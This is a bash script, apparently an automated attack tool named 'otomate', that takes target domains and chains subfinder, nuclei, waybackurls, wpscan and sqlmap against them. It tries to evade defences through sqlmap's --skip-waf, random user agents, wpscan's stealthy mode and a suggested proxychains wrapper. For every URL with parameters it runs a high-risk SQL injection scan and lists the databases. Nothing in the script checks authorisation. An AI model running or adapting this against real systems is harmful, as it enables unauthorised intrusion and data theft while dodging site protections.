#!/bin/bash

bc='\e[35m\e[1m'
info='\e[33m'
ok='\e[32m'
warn='\e[31m'
bold='\e[1m'
ul='\e[4m'
rc='\e[0m'


showBanner() {
echo -e "$bc


	           d8P                                     d8P
	        d888888P                                d888888P
	 d8888b   ?88'   d8888b   88bd8b,d88b  d888b8b    ?88'   d8888b
	d8P' ?88  88P   d8P' ?88  88P'\`?8P'?8bd8P' ?88    88P   d8b_,dP
	88b  d88  88b   88b  d88 d88  d88  88P88b  ,88b   88b   88b
	\`?8888P'  \`?8b  \`?8888P'd88' d88'  88b\`?88P'\`88b  \`?8b  \`?888P'


	                                                               $rc"
}

checkRequirements() {

	crawler='waybackurls'
	requirements=( "$crawler" 'subfinder' 'sqlmap' 'curl' 'wpscan' 'nuclei' )

	for requirement in "${requirements[@]}"; do
		if ! command -v "$requirement" > /dev/null; then
			echo -e "\n$warn ! ${rc}${rc}$requirement not found!$rc"
			exit 1
		fi
	done

}

checkIsUp() {

	if curl -s "$target" 1>/dev/null; then
		echo -e "\n$ok + ${rc}Connected to $ul$bold$target$rc"
	else
		echo -e "\n$warn ! ${rc}Can't reach $ul$bold$target$rc, skipping..."
		return 1
	fi

}

wpscanUrl() {

	url=$( echo "$url" | cut -d '/' -f 3 | sort -u )
	echo -e "\n$ok + $rc$ul$bold$url$rc seems to run wordpress, running wpscan...$rc"

	wpscan_cmd='wpscan --random-user-agent -e vp, vt, cd, dbe, u, m --stealthy --ignore-main-redirect'
	$wpscan_cmd --url "$url"

}

sqlmapUrl() {

	sqlmap_risk='2'
	sqlmap_level='5'
	sqlmap_cmd="sqlmap -u $url --skip-waf --batch --dbs --risk $sqlmap_risk --level $sqlmap_level --random-agent"

	echo -e "\n$info → ${rc}Searching for SQLi on $ul$bold$url$rc...$rc"

	$sqlmap_cmd
#	$sqlmap_cmd --forms

}


searchSubdomain() {

	echo -e "\n$info → ${rc}Searching for subdomain on $ul$bold$target$rc...$rc"
	found_subdomains=( $( subfinder -d "$target" -all -silent ) )

	if [ -z "$found_subdomains" ]; then
		echo -e "\n$warn ! ${rc}${rc}No subdomain found on $ul$bold$target$rc!$rc"
		return 1
	else
		echo -e "\n$ok + ${rc}$ulFound $bold${#found_subdomains[@]}$rc$ul subdomain(s) to test!$rc:"
		for found_subdomain in "${found_subdomains[@]}"; do
			echo -e "$ok + $rc$found_subdomain"
		done
	fi

}


searchUrl() {

	echo -e "\n$info → ${rc}Searching for URL on $ul$bold$subdomain$rc...$rc"
#	found_urls=( $( katana -aff -jc -kf -fx -retry 3 -u "$subdomain" -silent ) )
#	found_urls=( $( $crawler $subdomain ))
	found_urls=( $( $crawler $subdomain | sort -u ))

	if [ -z "$found_urls" ]; then
		echo -e "\n$warn ! ${rc}${rc}No URL found on $ul$bold$subdomain$rc!$rc"
		return 1
	else
		echo -e "\n$ok + ${rc}Found $ul$bold${#found_urls[@]}$rc uniq url(s) to test!$rc"
	fi

}

testTarget() {

	searchSubdomain

	for subdomain in "${found_subdomains[@]}"; do

		nuclei -as -fhr "$subdomain"

		searchUrl

		for url in "${found_urls[@]}"; do

			if echo "$url" | grep '/wp-' 1>/dev/null; then wpscanUrl ; fi

			if echo -e "\n$url" | grep -aE '=|\?' 1>/dev/null ; then sqlmapUrl; fi

		done

	done
}


main() {

	checkRequirements

	targets=( "$@" )

	if [ -z $targets ]; then

		echo -e "\n\n$info → ${rc}(proxychains) .$0 <domain.tld>$rc\n"
		exit 1

	fi


	for target in "${targets[@]}"; do

		echo -e "\n$info → ${rc}Testing if $ul$bold$target$rc is up...$rc"
		if checkIsUp; then
			testTarget
		fi

	done

}

showBanner&&main "$@"
